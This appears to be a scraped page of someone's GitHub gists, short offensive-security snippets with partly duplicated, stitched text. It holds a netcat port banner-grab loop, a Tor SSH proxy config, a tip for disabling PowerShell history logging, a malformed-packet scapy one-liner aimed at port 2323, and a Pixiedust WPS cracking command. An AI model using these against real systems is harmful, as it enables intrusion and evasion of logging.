hook hook-s3c

## cleandiscord.sh
#!/bin/bash

#if test "$#" -ne 2;
#  then echo "example usage: ./cleandiscord.sh general 30"
#  exit 1
#fi

#WID=`xdotool search --onlyvisible --name "$1" | head -1`
#xdotool windowactivate --sync $WID
xdotool windowactivate --sync $(xdotool selectwindow)

## notes.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                hook-s3c
                / notes.md
            
            
              Created
              February 24, 2019 14:49
            
              
                "Grab banners from local IPv4 listening ports."
              
          
    referencing https://twitter.com/netsecfocus/status/1099049852112117760 ;
No nmap? No problem!
Grab banners from local IPv4 listening ports.
Look at me ma! I done a regex.
netstat -nlt | grep 'tcp ' | grep -Eo "[1-9][0-9]*" | xargs -I {} sh -c "echo "" | nc -v -n -w1 127.0.0.1 {}"

  
## gist:e398b79c9dd9cfbebf5d7b5bd696314e
Host *
CheckHostIP no
Compression yes
Protocol 2
ProxyCommand connect -4 -S localhost:9050 $(tor-resolve %h localhost:9050) %p

## gist:744d1b1b1f2fcd65c13ce5608355a01b
Host *
CheckHostIP no
Compression yes
Protocol 2
ProxyCommand connect -4 -S localhost:9050 $(tor-resolve %h localhost:9050) %p

## info.txt
Logs are held by default in the user profile:
\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

this directory also hosts per-application logs

--------------------------------------------------------------
Disable Logging...

remove-module psreadline

## notes.txt
https://www.cybereason.com/blog/dcom-lateral-movement-techniques
https://bohops.com/2018/04/28/abusing-dcom-for-yet-another-lateral-movement-technique/
https://bohops.com/2018/06/28/abusing-com-registry-structure-clsid-localserver32-inprocserver32/
https://twitter.com/matterpreter/status/1057274637841846272
https://gist.github.com/matterpreter/68141686d21afae40e536693b223c476

## notes.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                hook-s3c
                / notes.md
            
            
              Created
              November 13, 2018 02:27
            
              
                notes on the Scarface story by Ankit Anubhav
              
          
    https://securityaffairs.co/wordpress/77951/malware/iot-botnet-backdoored.html
author: Ankit Anubhav

ZTE exploit contains a backdoor
base64 encoded string;
exec(base64.base64decode('...'))

  
## delete-twitter-dm.js
// Open direct messages window, paste this into console.
function deleteNextConversation()
{
    if (!(dm = document.getElementsByClassName("DMInbox-conversationItem")[0])) {
        clearInterval(tmr)
        return;
    }

    dm.firstChild.click();
    setTimeout('document.getElementsByClassName("js-actionDeleteConversation")[0].click()', 1000);

## gist:d0f6c4904a4262c638060e48483d30fa
pip install scapy
sudo scapy send(IP(dst=“Target IP“,options=[IPOption(“A”*8)])/TCP(dport=2323,options=[(19, “1"*18),(19, “2”*18)]))

## example.md

      
              1 file
            
          
              0 forks
            
          
              2 comments
            
          
              0 stars
            
          
                hook-s3c
                / example.md
            
            
              Created
              October 16, 2018 01:43
            
              
                Known working example of Pixiedust attack
              
          
    Attempts at using Pixie have never worked for me, so I wondered if the problem was the scenario or the tool itself.
Documentation is lacking and there are no tests in the project to verify.
After a few weeks of hunting and tweaking my google-fu, I found this;
pixiewps -e d0141b15656e96b85fcead2e8e76330d2b1ac1576bb026e7a328c0e1baf8cf91664371174c08ee12ec92b0519c54879f21255be5a8770e1fa1880470ef423c90e34d7847a6fcb4924563d1af1db0c481ead9852c519bf1dd429c163951cf69181b132aea2a3684caf35bc54aca1b20c88bb3b7339ff7d56e09139d77f0ac58079097938251dbbe75e86715cc6b7c0ca945fa8dd8d661beb73b414032798dadee32b5dd61bf105f18d89217760b75c5d966a5a490472ceba9e3b4224f3d89fb2b -r 631cf02e22f5949b78c93e063c0d566c86b839c157dd43f0ebb1385b3fbb8beb89ca502b99e45ddafdc9949db8074c4d99bbad43c60ac1a633f7137dfcc64d70234ca40a342cfa64241010c46a7dcd1930b6149f11df44cb8350401f7d090dbf9c9858c6ec1c2c2816299f2cea4f204e390e232454ffdd4d977746d652b8aef6d14e317b0a8c43e647c7613444faf8a50e3f6639a200664a4058365b829fb942d6aba9c0e341712faffc3612f2df1e70e66df
	#!/bin/bash

	#if test "$#" -ne 2;
	# then echo "example usage: ./cleandiscord.sh general 30"
	# exit 1
	#fi

	#WID=`xdotool search --onlyvisible --name "$1" \| head -1`
	#xdotool windowactivate --sync $WID
	xdotool windowactivate --sync $(xdotool selectwindow)
	Host *
	CheckHostIP no
	Compression yes
	Protocol 2
	ProxyCommand connect -4 -S localhost:9050 $(tor-resolve %h localhost:9050) %p
	Logs are held by default in the user profile:
	\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

	this directory also hosts per-application logs

	--------------------------------------------------------------
	Disable Logging...

	remove-module psreadline
	https://www.cybereason.com/blog/dcom-lateral-movement-techniques
	https://bohops.com/2018/04/28/abusing-dcom-for-yet-another-lateral-movement-technique/
	https://bohops.com/2018/06/28/abusing-com-registry-structure-clsid-localserver32-inprocserver32/
	https://twitter.com/matterpreter/status/1057274637841846272
	https://gist.github.com/matterpreter/68141686d21afae40e536693b223c476
	pip install scapy
	sudo scapy send(IP(dst=“Target IP“,options=[IPOption(“A”8)])/TCP(dport=2323,options=[(19, “1"18),(19, “2”*18)]))